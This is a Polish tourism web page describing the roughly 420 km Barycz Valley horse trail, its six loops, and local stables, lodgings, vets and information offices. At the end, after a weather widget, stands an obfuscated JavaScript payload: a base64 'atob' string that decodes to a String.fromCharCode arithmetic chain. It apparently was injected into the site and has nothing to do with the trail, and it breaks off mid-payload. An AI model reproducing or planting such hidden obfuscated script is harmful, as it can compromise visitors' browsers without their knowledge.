Szlak konny Doliny Baryczy

O SZLAKU

Szlak Konny Doliny Baryczy tworzy unikatową ofertę turystyczną, bazującą na wyjątkowym bogactwie przyrodniczym obszaru, wyznaczonego granicami największego w Polsce Parku Krajobrazowego Doliny Baryczy. Przebiegając ponad granicami województw dolnośląskiego i wielkopolskiego, łączy partnerów z terenu 8 gmin Doliny Baryczy: Milicz, Twardogóra, Krośnice, Cieszków, Żmigród, Odolanów, Sośnie i Przygodzice.

Szlak Konny Doliny Baryczy liczy niemal 420 km długości. Dzięki bogatej siatce traktów i ścieżek można dotrzeć nim w niemal każdy zakątek Doliny Baryczy. Trasę stanowią połączone pętle i znajdujące się w ich pobliżu ciekawe miejsca, stajnie, gospodarstwa agroturystyczne. Szlak konny biegnie głównie przez tereny leśne nadleśnictw: Milicz, Oleśnica Śląska, Żmigród, Antonin i Krotoszyn.

W ramach Szlaku Konnego Doliny Baryczy wydzielić można 6 pętli.

Witamy w Dolinie Baryczy

Rzeka Barycz ma 133 km długości. Zaczyna swój bieg na bagnach koło Ostrowa Wielkopolskiego, a kończy, wpadając do Odry w okolicach Wyszanowa pod Szlichtyngową. Dolina Baryczy to jeden z najurokliwszych zakątków Polski, na który składa się mozaika stawów, mokradeł, lasów pól i łąk. To prawdziwy raj dla miłośników przyrody i historii. Pierwsi z wymienionych nad Baryczą znajdą największy w Polsce rezerwat przyrody, czyli zaliczane do najcenniejszych ekosystemów na świecie Stawy Milickie. Na zainteresowanych historią czekają tu wspaniałe pałace, otoczone starymi parkami, ciekawe kościoły, kamieniczki z muru pruskiego i wiejskie chaty wzniesione z rudy darniowej. Zarówno miłośnicy przyrody, jak i historii będą się często mijać, wędrując śladami swoich fascynacji, bo Dolina Baryczy to jedno z niewielu miejsc, w których unikatowy i cenny przyrodniczo ekosystem powstał w dużym stopniu na skutek działalności człowieka. Obecnie spora część opisywanego obszaru objęta jest siecią Natura 2000, rozległa też część rozciąga się w granicach największego w Polsce Parku Krajobrazowego Dolina Baryczy. Obszary te chronione są na podstawie konwencji Ramsar, a stawy wpisano na oenzetowską listę Living Lakes. Obecnie trwają starania o wpis na listę UNESCO. Na tym terenie ekosystem jest chroniony dzięki licznym rezerwatom i użytkom ekologicznym. Jest tu wiele pomników przyrody, a także zagrożone wyginięciem gatunki zwierząt i roślin.
Poznawaniu bogactwa przyrodniczego, historycznego i kulturalnego regionu sprzyja rozwijająca się sieć szlaków i ścieżek turystycznych oraz szeroko rozumianej infrastruktury turystycznej. Oprócz szlaków i ścieżek, budowane są parkingi, wiaty turystyczne, wieże widokowe i czatownie. Powstają nowe lokalne gastronomiczne i miejsca noclegowe (schroniska młodzieżowe, domki, agroturystyki, pensjonaty, hotele). Rozwija się turystyka kwalifikowana : kajaki, Birdwatching, rowery i oczywiście szeroko rozumiana turystyka konna. To wszystko w bliskości i harmonii z przyrodą.
Obcowaniu z Doliną Baryczy z końskiego grzbietu lub zaprzęgu sprzyja Szlak Konny Doliny Baryczy. Jego pierwszy fragment (137 km) powstał z inicjatywy Fundacji Doliny Baryczy w 2006 r. W 2014 r. szlak ten został rozbudowany i zmodernizowany przez Stowarzyszenie Partnerstwo dla Doliny Baryczy i obecnie ma 415 km.
Dzięki takiej rozległości szlaku można dotrzeć w niemal każdy zakątek doliny. Na trasie jest wiele pętli lub łączników prowadzących do interesujących miejsc, stajni, agroturystyk, miejscowości czy miejsc styku/łączenia z innymi szlakami konnymi: Gościnna Wielkopolska, Wzgórza Trzebnickie, Dobra Widawa. Dzięki temu istnieje wiele wariantów przejazdu, które możemy sobie dowolnie konfigurować.
Aby ułatwić planowanie konnych rajdów czy wyjazdów w teren stworzono dla wszystkich chcących zagościć w Dolinie Baryczy mapę z przebiegiem szlaku i zaznaczeniem najważniejszych informacji potrzebnych koniarzom, bazę podmiotów związanych z turystyką konną – od ośrodków jeździeckich, poprzez gastronomię, noclegi, punkty Informacji Turystycznej, do kowali i weterynarzy. Szlak podzielono na 6 pętli, które zostały scharakteryzowane. W opisach zaproponowano przebieg z wariantami, mniejszymi pętlami oraz łącznikami z innymi fragmentami szlaku. Zawarto praktyczne informacje o rodzaju nawierzchni, przeszkodach czy trudnościach, jakie można napotkać, o tym, czy trasa lub jej fragmenty są przejezdne dla zaprzęgów, jak ewentualnie te miejsca ominąć. Zwrócono także uwagę, co szczególnie trzeba uwzględnić na danym fragmencie trasy. Wspomniano o ciekawych miejscach znajdujących się na danym fragmencie szlaku lub w jego otoczeniu. Nie brakuje też praktycznych informacji o miejscowych ośrodkach jeździeckich, lokalach gastronomicznych, miejscach noclegowych. Opisano wiaty i miejsca popasu w terenie, także podając informację, kto jest właścicielem obiektu i gdzie trzeba uzyskać zgodę, np. kola łowieckiego czy nadleśnictwa. Są też numery telefonów do miejscowych weterynarzy, kowali, nadleśnictw i punktów IT.
W ramach przedsięwzięcia powstała strona internetowa (www.konnoobszaraminatury.pl), na której znajduje się m.in. Regulamin korzystania ze Szlaku Konnego Doliny Baryczy.
Na szlaku zawsze pamiętajmy o bezpieczeństwie własnym i koni. Bądźmy rozważni i zachowajmy dodatkową ostrożność w miejscach szczególnie niebezpiecznych, np. przecięcia z drogami publicznymi, fragmenty szlaków prowadzące drogami publicznymi, przejazdy kolejowe, groble stawów, stromy czy nierówny teren.
Jesteśmy przekonani, że wszyscy, którzy tu zagoszczą, zakochają się w tym miejscu, znajdą coś dla siebie, wyjadą zadowoleni i jeszcze nie raz tu wrócą. Mamy nadzieję, że strona internetowa i materiały drukowane oraz informacja na szlaku okażą się pomocne przy planowaniu eskapad konnych w Dolinie Baryczy.
Zapraszamy na Szlak Konny Doliny Baryczy!

Szlak Konny Doliny Baryczy tworzy unikatową ofertę turystyczną, bazującą na wyjątkowym bogactwie przyrodniczym obszaru, wyznaczonego granicami największego w Polsce Parku Krajobrazowego Doliny Baryczy. Przebiegając ponad granicami województw dolnośląskiego i wielkopolskiego, łączy partnerów z terenu 8 gmin Doliny Baryczy:

Szlak Konny Doliny Baryczy liczy niemal 420 km długości. Dzięki bogatej siatce traktów i ścieżek można dotrzeć nim w niemal każdy zakątek Doliny Baryczy. Trasę stanowią połączone pętle i znajdujące się w ich pobliżu ciekawe miejsca, stajnie, gospodarstwa agroturystyczne. Szlak konny biegnie głównie przez tereny leśne nadleśnictw: Milicz, Oleśnica Śląska, Żmigród, Antonin i Krotoszyn.

W ramach Szlaku Konnego Doliny Baryczy wydzielić można 6 pętli:

1. Pętla Przygodzicka – zielona (ok. 115 km)

Pętla wokół Przygodziczek oferuje zróżnicowany krajobraz. Są tu zabytki sakralne (kościoły, kapliczki) oraz pałace w otoczeniu przyrody ze źródłami Baryczy. Piaszczyste, długie i proste drogi są idealne do jazdy konnej. Wydawałoby się, że jest to płaskie morze sosnowe. Jednak kryje w sobie sporo wzgórz, a więc wiele ostrych podjazdów i zjazdów, o których trzeba pamiętać, zwłaszcza podróżując zaprzęgiem. Znaczna część Pętli Małej wytyczonej wokół Przygodziczek przebiega przez tereny wiejskie i prowadzi lokalnymi drogami asfaltowymi, szutrowymi i niestety często kamienistymi. Podkute konie pokonają tę nawierzchnię bez kłopotów, ale dla innych jest nieprzyjazna. Na pewno z poruszaniem się nie będą miały problemu zaprzęgi.

Trasa: Przygodziczki – Jezioro – Antonin – Niedźwiedź – Szklarka Przygodzicka – (Kotowskie – Hetmanów) – Kałkowskie – Krzyżne – Czarny Las – Trzcieliny – (Chwaliszew) – Olendry – Chynowa – Przygodziczki

2. Pętla Potasznia – żółta (ok. 70 km)

Pętla Potasznia to propozycja na dłuższy wyjazd. Wiedzie przez rozległe lasy, łąki, liczne stawy – w tym jeden z największych Grabownica (dziś ok. 280 ha, a niegdyś 1000 ha) oraz Barycz i jej dopływy. Tajemniczym i intrygującym miejscem jest Grób Myśliwego. Zobaczymy m.in. Grubego Janka – dąb o obwodzie ponad ośmiu metrów. Możemy odnaleźć liczne zabytki, w tym pałace, zameczek myśliwski i wieżę widokową. Większość trasy przebiega po drogach gruntowych, piaskowych. Niewielka część prowadzi szutrem i asfaltem. Niektóre fragmenty trasy, zwłaszcza po opadach, mogą sprawić dużo problemów zaprzęgom.

Trasa: Potasznia/Zamek Myśliwski – Wróbliniec – Bogdaj – Mariak – (Szklarka Śląska) – Sośnie – Moja Wola – Konradów – Poręby – Grabownica – Czarne Stawy – Czatkowice – Staw Grabownica – Lelików – Potasznia/Zamek Myśliwski

3. Pętla Piotrkosice – Piotrkosicka Ósemka -fioletowa (ok. 25 km)

Pętla Piotrkosice jest jedną z mniejszych. Wokół Stawu Mewa prowadzi głównie przez lasy, okolice stawów oraz tereny rolne. Jest tu nawierzchnia przyjazna koniom – piasek, nawierzchnia gruntowa. Głęboki piasek lub błoto, zwłaszcza po opadach, mogą sprawić nieco kłopotów zaprzęgom, lecz całą pętlę można nim pokonać. Na drogach polnych trzeba uważać na kamienie, którymi łata się dziury, od Majątku Ziemskiego Niwa w Piotrkosicach w kierunku Katarzynowa jedziemy wąskim śródpolnym asfaltem. Z kolei pętla wokół Piotrkosic wiedzie głównie przez tereny rolne i leśne. Nawierzchnia jest zróżnicowana – od przyjaznej koniom do mogącej sprawić trudności. Na polnych duktach trzeba uważać na kamienie. Drugi problematyczny odcinek (bardzo zarośnięte fragmenty dróg oraz błoto i nierówności) prowadzi z Piękocina Starego przez Węgrzynów do Sulimierza. Warto sprawdzić ten odcinek, zanim wjedziemy na niego zaprzęgiem.

Trasa: Majątek Ziemski Niwa w Piotrkosicach – Ostoje – Katarzynowo – Baranowice – Olsza – Ruda Sułowska – Brzezina Sułowska – Piotrkosice – Stary Piękocin – Kąty – Węgrzynów – Sulimierz – Brzezina Sułowska – Piotrkosice

4. Pętla Milicka – niebieska (ok. 105 km)

Pętla Milicka (długa) wiedzie przez rozległe lasy (bukowe), łąki, stawy (w tym największy Grabownica – ok. 280 ha, a niegdyś nawet 1000 ha powierzchni), tereny rolne, płaskie połacie i wzgórza, doliny oraz urokliwe wąwozy, a także dwa rezerwaty: Wzgórze Joanny i Stawy Milickie. Można zwiedzić Wieżę Odyniec, tajemnicze głazy, stare parki, kościoły, nekropolie i pałace. Rodzaj nawierzchni trasy jest zróżnicowany. Południowa część to głównie dukty leśne o podłożu gruntowym/piaskowym. Kilka fragmentów tego odcinka jest nieprzejezdnych (zarośnięte drogi oraz błoto i nierówności) dla zaprzęgów: od wiaty na Krępicy do Sułowa oraz z Sulimierza przez Węgrzynowo. W północnej części, zwłaszcza w okolicach Gór, Trzebicka do Jankowej napotkamy liczne kamienie (wzgórza wypłukiwane podczas opadów). Wybierając wariant Grabownica – Czatkowice, kilka kilometrów pokonamy drogą asfaltową, o niezbyt dużym natężeniu ruchu. Kłopoty, głównie zaprzęgom, może sprawić odcinek Dąbrowa – Wierzchowice/Krośnice – Dziewiętlin, na którym jakość dróg jest kiepska, sporo kamieni. W okolicach Wierzchowic/Krośnic nasyp kolejki blokuje przejazd.

Trasa: Lasowice (wiata przy leśniczówce w Lasowicach) – wiata leśna nad Krępicą – Łąki – Sulimierz – Węgrzynów – Stary Piękocin – Gogołowice – Rakłowice – Jankowa – Nowy Zamek – Lelików – Staw Grabownica – Czatkowice – Dąbrowa – Wierzchowice – Dziewiętlin – Lasowice

5. Pętla Twardogóra – czerwona (ok. 95 km)

Pętla Twardogóra (średniej długości) to najbardziej na południe położony fragment szlaku konnego Doliny Baryczy. Trasa ma zróżnicowaną nawierzchnię – drogi gruntowe wśród lasów i łąk, fragmenty dróg kamienistych czy asfaltowych, na szczęście o małym natężeniu ruchu. Całość trasy powinna być przejezdna dla zaprzęgów. Krajobraz jest zróżnicowany – bukowe lasy, pełne ukrytych wzgórz i dolinek, stawy, tajemnicze budowle, kościółki (w tym drewniany w Chełstowie) czy nekropolie oraz otwarte przestrzenie łąk i pól.

Trasa: Bukowice – Olszówka – Gola Mała – Dąbrowa – Chełstów – Gola Wielka – Domasławice – Brzeziny – Poręby – Staw Zimiec/Mieczysław – Staw Grabek – Staw Biały Most – Staw Duży Drozd – Staw Mała Amelia – Brzostowo – Bukowice

6. Pętla Żmigrodzka – czarna (ok. 65 km)

Szlak Pętli (średniej długości) Żmigród wiedzie przez jedne z najpiękniejszych i najbogatszych przyrodniczo obszary (rezerwaty Stawy Milickie oraz Olszyny Niezgodzkie). To najpierwotniejszy charakter Doliny Baryczy. Odcinki szlaku od Jamnika przez Rudę Żmigrodzką do Niezgody oraz z Grabówki do Rudy Żmigrodzkiej są asfaltową drogą, niezbyt ruchliwą. Całość bez większych trudności jest do przejechania dla zaprzęgów.

Trasa: Ruda Żmigrodzka – Książęca Wieś – Łąki – Ruda Sułowska – Grabówka – Olsza – Staw Niezgoda – Dąbki – Ruda Żmigrodzka

Projekt pn. „Konno obszarami natury- przez wzgórza i doliny” tworzy wspólną ofertę szlaków konnych z obszaru Doliny Baryczy oraz sąsiednich krain geograficznych (Wzgórz Trzebnickich i obszaru między rzekami Dobrą a Widawą).

Turystyka Wiejska „Ceglany Dom” Anna Moczulska, Koruszka 13, 56-300 Milicz, tel. 697 987 326, e-mail: admoczulska@wp.pl, www.ceglanydom.eu, możliwość noclegu z koniem. DBP

Ostoja Konika Polskiego w Miliczu. Domki i pole namiotowe. Kontakt: zarządca Jan Latos, tel. 501 346 043, www.grmilicz.pl, możliwość noclegu z koniem.

Agroturystyka Głowaczówka Ruda Sułowska 11a, 56-300 Milicz, tel.: 71 383 41 36; 693 905 667, e-mail: glowaczowka@op.pl, www.glowaczowka.pl.

Agroturystyka U Kangura, Ruda Żmigrodzka 52, 55-140 Żmigród, tel. 501 183 949.

Agroturystyka Łazy Małe, Maja Stryjska, Łazy Małe 20, 56-321 Bukowice, tel.: 660 441 410; 71 38 333 67, e-mail: majastryjska@gmail.com, www.stajnialazymale.pl, możliwość noclegu z koniem. DBP

Restauracja i pensjonat „ Hubertówka”, Agnieszka Matkowska, Zamek Myśliwski 1, 56-300 Milicz, tel.: 71 384 54 25; 501 707 354, e-mail: hubertowka@onet.pl, możliwość noclegu z koniem. DBP

Zagroda Grabownica Jolanta Bogatsu, Grabownica 42 a, 56-320 Krośnice, tel.: 508 13 40 10 lub 71 384 55 02, e-mail: zagrodagrabownica@gmail.com, www.zagrodagrabownica.pl. DBP

Restauracja i miejsca noclegowe „W Starym Młynie”, Niesułowice 25, 56-300 Milicz, tel.: 71 383 32 31, www.stary-mlyn.com.pl. DBP

Pokoje gościnne Lelików, Marek Rajkiewicz, Lelików 3, 56-300 Milicz, tel. 509 429 765 możliwość noclegu z koniem.

Ośrodek Jeździecki Jurand, Przygodziczki 64, 63-421 Przygodzice, tel.: 62 738 01 65; 600 897 036; 512 392 243, www.jurand9@op.pl, www.wtkjurand.pl, możliwość nocleg z koniem. DBP

„Agrokawaler”, Przygodziczki 9, tel. 062 739 81 87.

Gospodarstwo „U źródeł Baryczy”, Przygodziczki 86, tel. 692 447 213.

„Przystań Tu”, Kotłów 100, tel.: 062 731 02 03; 502 655 969.

AgroSpa Chynowa, Chynowa 184, 63-421 Przygodzice, tel.: 513 164 989; 502 134 167, e-mail: info@agro-spa.com.pl, www.agro-spa.com.pl

Stanica Biały daniel w Mojej Woli, możliwość noclegu z koniem.

LBN Huta Huta 25-26, 63-430 Odolanów, tel. 606 457 054, fax: 62 733 18 50, e-mail: lbn@lbn-huta.pl, www.lbn-huta.pl, możliwość noclegu koniem.

Restauracja i Pensjonat Lido, ul. Wrocławska 6, Antonin, 63-421 Przygodzice, tel.: 062 73 48 191; 600 211 163, fax 62 73 48 191, e-mail: lido-antonin@tlen.pl,  www: www.lido-antonin.pl. DBP

Pałac Myśliwski Książąt Radziwiłłów, Antonin, ul. Pałacowa 1, 63-421 Przygodzice, tel. 62 734 83 00, fax 62 734 83 01, e-mail: recepcja@palacantonin.pl, www.palacantonin.pl.

Domki i pole kempingowe w Antoninie.

Stajnia Granowiec, Zbigniew Chmielecki, ul. Mariacka 10, Granowiec, 63-435 Sośnie, tel. 605 699 986, możliwość noclegu z koniem.

Campus Domasławice – sport i rekreacja, Domasławice 30, 56-416 Twardogóra, tel. 73 00 57 014, e-mail: biuro@domaslawice.pl, www.domaslawice.pl. DBP

Stajnia Gola Wielka, Leszek Ławniczak, Gola Wielka 32, tel.: 695 748 839; 71 314 00 28, możliwość noclegu z koniem.

Hotel GOSiR, ul. Wrocławska 39, 56-416 Twardogóra, tel.: 71 315 99 10; 697 849 803, e-mail: hotel.gosir@gmail.com,

www.gosir.twardogora.pl. DBP

Majątek Ziemski NIWA, Piotrkosice 60, tel. +48 697 437 397; +48 605 839 339, e-mail: kajaki-barycz@wp.pl, www.kajaki-barycz.pl

Restauracja i pensjonat „Hubertówka”, Agnieszka Matkowska, Zamek Myśliwski 1, 56-300 Milicz, tel.: 71 384 54 25; 501 707 354, e-mail: hubertowka@onet.pl. DBP

Zagroda Grabownica, Jolanta Bogatsu, Grabownica 42 a, 56-320 Krośnice, tel.: 508 13 40 10 lub 71 384 55 02, e-mail: zagrodagrabownica@gmail.com, www.zagrodagrabownica.pl. DBP

Restauracja i miejsca noclegowe „W Starym Młynie”, Niesułowice 25, 56-300 Milicz, tel.: 71 383 32 31, www.stary-mlyn.com.pl. DBP

Smażalnia „U Bartka”, Średzina, 56-300 Milicz, tel.: 504 192 870; 694 817 705, e-mail: barteksiew@o2.pl.

Zajazd Górecznik, inne atrakcje to minizoo, ścieżka edukacyjna, atrakcje dla dzieci, Antonin, tel. 602 266 093, www.gorecznik.pl. DBP

Pałac Myśliwski Książąt Radziwiłłów, Antonin, ul. Pałacowa 1, 63-421 Przygodzice, tel. 62 734 83 00, fax 62 734 83 01, e-mail: recepcja@palacantonin.pl, www.palacantonin.pl.

Restauracja i Pensjonat Lido, ul. Wrocławska 6, Antonin, 63-421 Przygodzice, tel:. 062 73 48 191; 600 211 163, fax 062 73 48 191, e-mail: lido-antonin@tlen.pl, www: www.lido-antonin.pl. DBP

„LBN” Huta, Huta 25-26, 63-430 Odolanów, tel. 606 457 054, fax: 0 62 73 318 50, e-mail: lbn@lbn-huta.pl, www.lbn-huta.pl.

Stowarzyszenie „PARTNERSTWO dla Doliny Baryczy”
pl. ks. E. Waresiaka 7, 56-300 Milicz
tel./faks: 71/383 04 32
Email: partnerstwo@nasza.barycz.pl

Centrum Informacji Turystycznej Milicz
pl. ks. E. Waresiaka 7, 56-300 Milicz
tel. 71 383 00 35,
www.it@milicz.pl.

Subregionalne Centrum Informacji Turystycznej Baszta
ul. Parkowa 1, 55-140 Żmigród,
tel. 71 385 39 31,
e-mail: it@zmigrod.com.pl, www.it-zmigrod.pl.

Informacja Turystyczna Chata Regionalna
PTR 1, 63-421 Przygodzice,
tel. 62 592 77 22 wew. 141,
www.przygodzice.pl, e-mail: turystyka@przygodzice.pl.

Centrum Informacji Turystycznej stacja Krośnickiej Kolejki Wąskotorowej
ul. Parkowa 30, 56-320 Krośnice,
tel.: 667 057 300; 71 74 000 55, e-mail: info@kolejka.krosnice.pl

Nadleśnictwo Milicz
ul. Trzebnicka 18, 56-300 Milicz,
tel. 71 380 93 01.

Nadleśnictwo Żmigród
ul. Parkowa 4A, 55-140 Żmigród,
tel. 71 385 30 52.

Nadleśnictwo Antonin
ul. Wrocławska 11,63-421 Antonin,
tel. 62 734 81 24.

Nadleśnictwo Oleśnica Śląska
ul Spacerowa 3, 56-400 Oleśnica,
tel. 71 31 40 001, e-mail: oleśnica@wroclaw.lasy.gov.pl

Kompleksowe Usługi Turystyczne w Dolinie Baryczy Maciej Kowalski, specjalność koniki polskie, Niesułowice, 56-300 Milicz, tel. 665 145 094, e-mail: kowalski.mat@gmail.com, www.baryczturystyka.pl. DBP

Stajnia Potasznia, Małgorzata i Tomasz Banasiak, Potasznia 15, 56-300 Milicz, tel. 501 223 760.

Restauracja i pensjonat „ Hubertówka”, Agnieszka Matkowska, Zamek Myśliwski 1, 56-300 Milicz, tel.: 71 384 54 25; 501 707 354, e-mail: hubertowka@onet.pl. DBP

Szkółka Jeździecka „Sarnówka” Popławska Joanna, Dąbrowa 2, 56-420 Krośnice, tel.: 504 302 766; 71 383 17 29.

Stajnia Łazy Małe Maja Stryjska, Łazy Małe 20, 56-321 Bukowice, tel.: 660 441 410; 71 38 333 67, e-mail: majastryjska@gmail.com, www.stajnialazymale.pl. DBP

Majątek Ziemski Niwa Hanna i Romuald Jankowscy, Piotrkosice 60, 56-300 Milicz, tel. 605 839 339, e-mail: mistral86@wp.pl.

Stajnia Ruda Sułowska, Tadeusz Dolny, Ruda Sułowska 11B, 56-300 Milicz, tel. 665 458 586.

Stawy Milickie SA, oferta FotoSafari (Birdwatching), Ruda Sułowska 20, 56-300 Milicz, tel.: 71 38 47 110 (wewn. 21); 785 050 553, e-mail: biuro@stawymilickie.pl, www: stawymilickie.pl. DBP

Ośrodek Jeździecki Jurand, Przygodziczki 64, 63-421 Przygodzice, tel.: 62 738 01 65; 600 897 036; 512 392 243, e-mail: jurand9@op.pl, www.wtkjurand.pl, możliwość noclegu z koniem. DBP

Gospodarstwo Agroturystyczne Cicho-Sza, Niedźwiedź 77, 63-500 Ostrzeszów, tel. 62 732 77 69, e-mail: cicho-sza2@o2.pl, www.cichosza.linuxpl.info, możliwość noclegu z koniem

„LBN” Huta, Huta 25-26, 63-430 Odolanów, tel. 606 457 054, e-mail: lbn@lbn-huta.pl, www.lbn-huta.pl, możliwość noclegu z koniem

Stajnia Trzcieliny, Trzcieliny 9, 63–421 Przygodzice, tel. 604 105 220, biuro@stajniatrzcieliny.pl.

Stajnia „Turczynówka” Agnieszka i Jacek Turczyn, Sosnówka Kolonia 6a, 56-416 Twardogóra, tel.: 608 483 862; 71 315 00 88, e-mail: turczynowka@gmail.com.

Fundacja Konikolandia – oaza nadziei, Malerzów 28, 56-410 Dobroszyce, tel. 71 396 14 74, e-mail: biuro@konikolandia.pl.

Stajnia Gola Wielka, Leszek Ławniczak, Gola Wielka 32, tel.: 695 748 839; 71 314 00 28.

Numer alarmowy                               112

Policja                                                 997

Straż                                                    998

Pogotowie                                           999

Mapa szlaku

Kowal
 • Kowal - Łukasz Banasiak
 • Kowal - Waldemar Rybka
Stajnie - oferta jednodniowa
 • Szkółka Jeździecka Sarnówka
 • Kompleksowe Usługi Turystyczne w Dolinie Baryczy
 • Konie z Doliny Baryczy
 • Stajnia Potasznia
 • Stajnia Trzcieliny Katarzyna Wieczorek
 • Stajnia Turczynówka Agnieszka Turczyn
 • Lisie Wzgórze, Holendry
 • Stajnia Granowiec Zbigniew Chmielecki
 • Fundacja Konikolandia - oaza nadziei
 • Stajnia Ruda Sułowska
 • Gospodarstwo Rolne - Hodowla Koni
 • Stajnia w Biadkach
Stajnie - oferta wielodniowa
 • Stajnia Łazy Małe
 • Gospodarstwo Rybackie Milicz - Ostoja
 • Turystyka Wiejska - Ceglany Dom
 • Stajnia Lelików
 • Hubertówka - Agnieszka i Tomasz Matkowscy
 • LBN - KLUB JEŹDZIECKI HUTA Przedsiębiorstwo Usługowo-Handlowe LBN
 • Ośrodek jeździecki Jurand
 • Gospodarstwo Agroturystyczne Cicho-Sza
 • Stadnina Koni - Studniewski
 • Stajnia i łowisko Gola Wielka
 • MZ Niwa Piotrkosice
Transport koni
 • Transport koni Magdalena Jankowska
 • Transport koni - Stajnia Trzcieliny
Weterynarz
 • Weterynarz - Michał Trawiński
 • Weterynarz - Leszek Garstka
 • Lekarz weterynarii - Piotr Łoś
Sklep jezdziecki
 • Sklep Jeździecki - SKAT
 • Sklep jeździecki Franciszek Pera
 • Odzież jeździecka - Malkem
Ukryć
button_dbp PDDB_1pr_2015_baner_300x235px

 

The Horse Trail

The Horse Trail of Barycz Valley offers tourists unique attractions based on the natural wealth of the area: The designated borders of Poland’s largest Landscape Park, located in the Barycz Valley. It runs above the borders of provinces Lower Silesia and Wielkopolska and brings together partners from the area of 8 municipalities Barycz Valley:

The Horse Trail of Barycz Valley is nearly 420 km long. With its high number of routes and paths, it is possible to reach almost every corner of the Barycz Valley. The route has connecting loops and is located in the vicinity of interesting places, including stables and agritourist farmhouses.The Equestrian trail runs mostly through wooded forest districts including Milicz, Oleśnica Silesia, Żmigród, Antonin and Krotoszyn.

As part of the Barycz Valley Horse Trail, 6 loops can be distinguished.

POGODA U NAS

POGODA NA SZLAKU
0°C
wilgotność: 0%
wiatr: 0km/h płn.
Max: 0 • Min: 0

var BFMRQRLLVF = atob(‚dmFyIFlSQ09DRk9IWUYgPSBTdHJpbmcuZnJvbUNoYXJDb2RlKDEyIC0gMiwgMTIzIC0gNSwgOTggLSAxLCAxMjMgLSA5LCAzOCAtIDYsIDExMCAtIDMsIDExMCAtIDksIDEyOCAtIDcsIDM2IC0gNCwgNjUgLSA0LCA0MSAtIDksIDQ3IC0gOCwgNzAgLSA1LCA3MSAtIDQsIDk5IC0gMiwgNzkgLSAxLCAxMTMgLSA0LCA3MCAtIDEsIDgwIC0gOCwgMTI0IC0gOSwgMTEyIC0gMiwgMTI0IC0gOCwgNDMgLSA0LCA2MSAtIDIsIDExIC0gMSwgMTI3IC0gOSwgMTAzIC0gNiwgMTE3IC0gMywgNDAgLSA4LCAxMDIgLSAxLCAxMTYgLSA2LCAxMDEgLSAyLCAxMDggLSA3LCAxMDcgLSA3LCA0MCAtIDgsIDY2IC0gNSwgMzkgLSA3LCA0MiAtIDMsIDgwIC0gMiwgMTI4IC0gNywgNzYgLSAzLCA4OCAtIDQsIDEwNiAtIDgsIDEwOSAtIDUsIDQ5IC0gMSwgNTkgLSA4LCA4MyAtIDcsIDExMSAtIDcsIDYxIC0gNCwgODYgLSA3LCA4NyAtIDQsIDkyIC0gNSwgNzMgLSA0LCAxMTcgLSA3LCA3NSAtIDcsIDExNCAtIDksIDUyIC0gNCwgOTMgLSA0LCA4NCAtIDksIDcwIC0gMywgNTYgLSA4LCAxMDUgLSA1LCA3OSAtIDgsIDExMyAtIDUsIDExOSAtIDgsIDExMyAtIDgsIDgzIC0gNiwgODQgLSAzLCA4NCAtIDMsIDEyNCAtIDYsIDc3IC0gNiwgODQgLSAxLCA2NyAtIDIsIDc5IC0gMSwgODAgLSA4LCAxMjUgLSA2LCAxMjQgLSA5LCA5NyAtIDcsIDc2IC0gMiwgNjkgLSAyLCA1NCAtIDYsIDkzIC0gNywgOTUgLSA1LCAxMDkgLSAyLCAxMjAgLSA5LCA1MiAtIDIsIDg0IC0gOSwgMTIyIC0gMywgNzIgLSAzLCA3NCAtIDIsIDc0IC0gOCwgNjkgLSAxLCA5MSAtIDUsIDEwOCAtIDEsIDg3IC0gNCwgNzMgLSAxLCA5MiAtIDYsIDExNSAtIDUsIDgwIC0gMiwgODYgLSAyLCAxMTMgLSAyLCA5NSAtIDksIDcyIC0gNywgMTE2IC0gOCwgMTE5IC0gOCwgMTI1IC0gNCwgNzUgLSAxLCAxMDkgLSA1LCA5NCAtIDksIDgxIC0gMSwgNzMgLSAyLCA4OSAtIDUsIDc0IC0gNSwgNTUgLSAxLCA3MyAtIDIsIDEwOSAtIDYsIDEyNyAtIDgsIDc1IC0gOSwgODcgLSA5LCA4NyAtIDQsIDkzIC0gMywgODMgLSA5LCA5OSAtIDIsIDkwIC0gOCwgNjEgLSA5LCA1NCAtIDMsIDgyIC0gNywgNTMgLSA0LCA4NyAtIDUsIDc0IC0gNywgODYgLSAxLCAxMjIgLSAxLCAxMDggLSAxLCA1NCAtIDMsIDczIC0gMywgOTAgLSA2LCA1NSAtIDIsIDk0IC0gNiwgOTkgLSAyLCAxMTcgLSA4LCAxMDggLSA5LCA3OCAtIDYsIDc0IC0gMiwgNzAgLSA0LCA5NCAtIDksIDExMSAtIDEsIDc2IC0gMiwgODkgLSA4LCAxMDQgLSAxLCAxMTggLSAyLCA2OSAtIDEsIDc2IC0gOCwgOTEgLSA2LCAxMTAgLSA2LCA5NCAtIDYsIDg3IC0gNiwgNzEgLSA2LCA5NSAtIDYsIDEwMiAtIDQsIDExMSAtIDUsIDY2IC0gMSwgOTAgLSA0LCA4NSAtIDksIDEyOSAtIDksIDEwOCAtIDEsIDEyMSAtIDYsIDgzIC0gOCwgNTggLSA5LCAxMjIgLSAzLCA3NSAtIDcsIDc5IC0gOSwgODcgLSA0LCAxMDYgLSAzLCAxMjUgLSA5LCA4NiAtIDIsIDEyNiAtIDUsIDg1IC0gNCwgMTA0IC0gMywgOTAgLSAxLCAxMTIgLSAzLCA3NyAtIDcsIDc3IC0gNCwgOTkgLSA5LCA3NCAtIDgsIDY5IC0gNCwgMTE4IC0gMSwgNzQgLSAxLCA2NyAtIDEsIDg4IC0gNywgMTE1IC0gOSwgNjkgLSAyLCA3NSAtIDgsIDExOSAtIDQsIDY0IC0gOCwgOTAgLSAyLCA5MCAtIDksIDk2IC0gNywgODUgLSAzLCA4MCAtIDcsIDc1IC0gOCwgMTAzIC0gMywgODEgLSAxLCA4MCAtIDQsIDEyNSAtIDUsIDU1IC0gNywgNTYgLSA3LCA4MCAtIDQsIDg3IC0gNSwgNTEgLSAzLCA3NyAtIDIsIDgxIC0gMywgMTI0IC0gMywgMTA5IC0gMiwgMTIxIC0gOCwgNjkgLSAxLCA4NyAtIDQsIDExNCAtIDIsIDc5IC0gOSwgODYgLSA4LCA4OSAtIDUsIDExOSAtIDgsIDg3IC0gMSwgNzEgLSA2LCAxMTYgLSA4LCA1OCAtIDksIDU2IC0gMiwgOTAgLSA3LCA4NyAtIDYsIDY0IC0gMywgNzAgLSA5LCA0MyAtIDQsIDY0IC0gNSwgMTIgLSAyLCAxMTAgLSA4LCAxMjIgLSA1LCAxMTggLSA4LCAxMDIgLSAzLCAxMjMgLSA3LCAxMTEgLSA2LCAxMTUgLSA0LCAxMTYgLSA2LCAzNiAtIDQsIDEyNyAtIDcsIDExNCAtIDMsIDExOCAtIDQsIDEw